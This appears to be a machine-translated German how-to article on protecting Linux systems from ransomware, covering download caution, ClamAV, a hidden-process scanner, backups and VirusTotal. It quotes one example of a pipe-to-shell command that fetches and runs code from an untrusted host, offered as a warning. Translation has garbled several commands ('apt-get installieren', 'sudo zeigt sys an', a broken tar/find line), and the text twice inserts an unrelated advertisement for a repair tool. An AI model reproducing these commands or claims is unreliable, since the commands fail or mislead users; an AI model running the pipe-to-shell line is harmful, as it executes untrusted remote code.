Wie man Linux vor Ransomwares schützt

Ransomware ist heutzutage eines der bedrohlicheren Probleme in der Welt der Netzwerksicherheit. Es ist beängstigend zu glauben, dass jemand deine Daten als Geisel halten könnte. Einige Ransomware-Infektionen verschlüsseln alle Daten eines bestimmten Datenträgers, und die dahinterstehenden Personen benötigen eine bestimmte Menge an Geld, bevor sie zustimmen, den zum Entsperren der Daten benötigten Schlüssel freizugeben. Das betrifft vor allem Menschen, die viel Geld in ihre Daten investieren. Es gibt jedoch ein paar gute Nachrichten für Linux-Benutzer.

In den meisten Situationen ist es für Ransomware-Code schwierig, mehr als nur das Home-Verzeichnis eines Benutzers zu steuern. Diese Programme verfügen nicht über die Berechtigungen, eine gesamte Installation zu löschen. Aus diesem Grund ist Linux-Ransomware eher ein Problem auf Servern, auf denen Betreiber immer Root-Zugriff haben. Ransomware sollte für Linux-Benutzer kein großes Problem darstellen, und es müssen mehrere Schritte unternommen werden, um zu verhindern, dass es für Sie passiert.

Methode 1: Verteidigen gegen Attacken im Stil von BashCrypt

BasyCrypt ist eine Proof-of-Concept-Ransomware, die bewiesen hat, dass es möglich ist, Server-Strukturen mit dieser Art von bösartigem Code zu infizieren. Dies bietet eine Basis für das Aussehen von Linux-Ransomware-Paketen. Während sie derzeit ungewöhnlich sind, funktionieren hier die gleichen vernünftigen Vorsichtsmaßnahmen für Serveradministratoren anderer Plattformen genauso gut. Das Problem besteht darin, dass in Umgebungen auf Unternehmensebene eine große Anzahl unterschiedlicher Personen ein Host-System verwenden kann.

Wenn Sie einen Mail-Server betreiben, kann es sehr schwer sein, Leute daran zu hindern, dumme Dinge zu tun. Geben Sie Ihr Bestes, um alle daran zu erinnern, keine Anlagen zu öffnen, bei denen sie sich nicht sicher sind, und immer Malware scannt alles in Frage. Eine andere Sache, die wirklich helfen kann, diese Arten von Angriffen zu verhindern, kommt davon, zu beobachten, wie Sie Binärdateien mit wget installieren. Natürlich fehlt Ihrem Mail-Server wahrscheinlich eine Desktop-Umgebung, und Sie verwenden wahrscheinlich wget, apt-get, yum oder pacman, um Pakete zu verwalten, die über uns kommen. Es ist sehr wichtig zu beobachten, welche Repositories in diesen Installationen verwendet werden. Manchmal sehen Sie entweder einen Befehl, mit dem Sie etwas wie wget http: //www.thisisaprettybadcoderepo.webs/ -O- | ausführen möchten sh, oder es könnte in einem Shell-Skript sein. Führen Sie es auf keine Weise aus, wenn Sie nicht wissen, wofür dieses Repository vorgesehen ist.

Methode 2: Installieren eines Scannerpakets

Es gibt mehrere Arten von Open-Source-Malware-Scanning-Technologie. ClamAV ist mit Abstand das bekannteste und Sie können es auf vielen apt-basierten Distributionen installieren, indem Sie Folgendes verwenden:

sudo apt-get installieren clamav

Wenn es installiert ist, sollte man clamav die Verwendung im Klartext erklären. Denken Sie daran, dass infizierte Dateien zwar gescannt und entfernt werden können, aber infektiöser Code nicht wirklich aus einer Datei entfernt werden kann. Dies ist eine Alles oder Nichts-Situation.

Es gibt einen zweiten Scanner, den Sie vielleicht nicht kennen, aber er ist nützlich, wenn versteckte Prozesse Sie erschrecken. Wenn Sie eine apt-basierte Distribution verwenden, geben Sie diesen Befehl zur Installation des unsichtbaren Scanners ein:

Sudo apt-get installieren einblenden

PRO TIPP: Wenn das Problem bei Ihrem Computer oder Laptop / Notebook auftritt, sollten Sie versuchen, die Reimage Plus Software zu verwenden, die die Repositories durchsuchen und beschädigte und fehlende Dateien ersetzen kann. Dies funktioniert in den meisten Fällen, in denen das Problem aufgrund einer Systembeschädigung auftritt. Sie können Reimage Plus herunterladen, indem Sie hier klicken

Wenn es installiert ist, geben Sie Folgendes ein:

sudo zeigt sys an

Dies wird einen vollständigen Scan Ihres Systems für versteckte Prozesse durchführen.

Methode 4: Halten Sie saubere Backups bereit

Dies sollte nicht einmal ein Problem sein, da jeder immer Backups machen sollte, aber gute Backups können sofort Ransomware zappen. Was sehr wenig Ransomware gibt es auf der Linux-Plattform neigt dazu, Dateien mit Erweiterungen anzugreifen, die spezifisch für Web-Entwicklungsplattformen sind. Das bedeutet, wenn Sie eine Menge .php, .xml oder .js Code herumliegen haben, wollen Sie dies speziell sichern. Betrachten Sie diese folgende Codezeile:

tar -cf backups.tar $ (find -name * .ruby -oder -name * .html)

Dies sollte eine große Bandarchivdatei jeder Datei mit den Erweiterungen .ruby und .html innerhalb einer Dateistruktur erstellen. Es kann dann in ein anderes temporäres Unterverzeichnis für die Extraktion verschoben werden, um sicherzustellen, dass es korrekt erstellt wurde.

Dieses Bandarchiv kann und sollte auf ein externes Volume verschoben werden. Sie können natürlich auch die .bz2-, .gz- oder .xv-Komprimierung verwenden. Möglicherweise möchten Sie gespiegelte Backups erstellen, indem Sie sie auf zwei verschiedene Volumes kopieren.

Methode 5: Verwenden von webbasierten Scannern

Vielleicht haben Sie ein RPM- oder DEB-Paket von einer Website heruntergeladen, die nützliche Software enthalten soll. Software wird auch über 7z oder komprimierte TAR-Dateien verteilt. Mobile Benutzer erhalten möglicherweise auch Android-Pakete im APK-Format. Es ist einfach, diese mit einem Tool direkt in Ihrem Browser zu scannen. Zeigen Sie es auf https://www.virustotal.com/ und klicken Sie nach dem Laden der Seite auf die Schaltfläche Choose File. Beachten Sie vor dem Hochladen, dass dies ein öffentlicher Server ist. Obwohl es sicher ist und von Alphabet Inc. betrieben wird, überträgt es Dateien öffentlich, was in einigen super-sicheren Umgebungen ein Problem sein kann. Es ist auch auf 128 MB Dateien beschränkt.

Wählen Sie Ihre Datei in dem Feld aus und wählen Sie Öffnen. Der Dateiname erscheint in der Zeile neben der Schaltfläche, nachdem die Box verschwunden ist.

Klicken Sie auf das große blaue Scannen Sie es! Taste. Sie werden eine weitere Box sehen, die anzeigt, dass das System Ihre Datei hochlädt.

Wenn jemand die Datei bereits vorher ausgecheckt hat, wird er Sie über den vorherigen Bericht informieren. Sie erkennt dies anhand einer SHA256-Summe, die genauso funktioniert wie die gleichen Linux-Befehlszeilentools, an die Sie gewöhnt sind. Wenn nicht, wird ein vollständiger Scan mit 53 verschiedenen Scan-Programmen ausgeführt. Einige von ihnen können beim Ausführen der Datei eine Zeitüberschreitung aufweisen, und diese Ergebnisse können problemlos ignoriert werden.

Einige Programme geben möglicherweise andere Ergebnisse als andere zurück, so dass es leicht ist, falsche positive Ergebnisse mit diesem System auszuschließen. Der beste Teil ist, dass es zwischen verschiedenen Plattformen funktioniert, was es gleichermaßen attraktiv macht, unabhängig davon, welche Distribution Sie auf verschiedenen Geräten haben. Es funktioniert auch gut von mobilen Distributionen wie Android, was wiederum eine gute Möglichkeit ist, APK-Pakete zu inspizieren, bevor Sie sie verwenden.

PRO TIPP: Wenn das Problem bei Ihrem Computer oder Laptop / Notebook auftritt, sollten Sie versuchen, die Reimage Plus Software zu verwenden, die die Repositories durchsuchen und beschädigte und fehlende Dateien ersetzen kann. Dies funktioniert in den meisten Fällen, in denen das Problem aufgrund einer Systembeschädigung auftritt. Sie können Reimage Plus herunterladen, indem Sie hier klicken

Facebook Twitter Google Plus Pinterest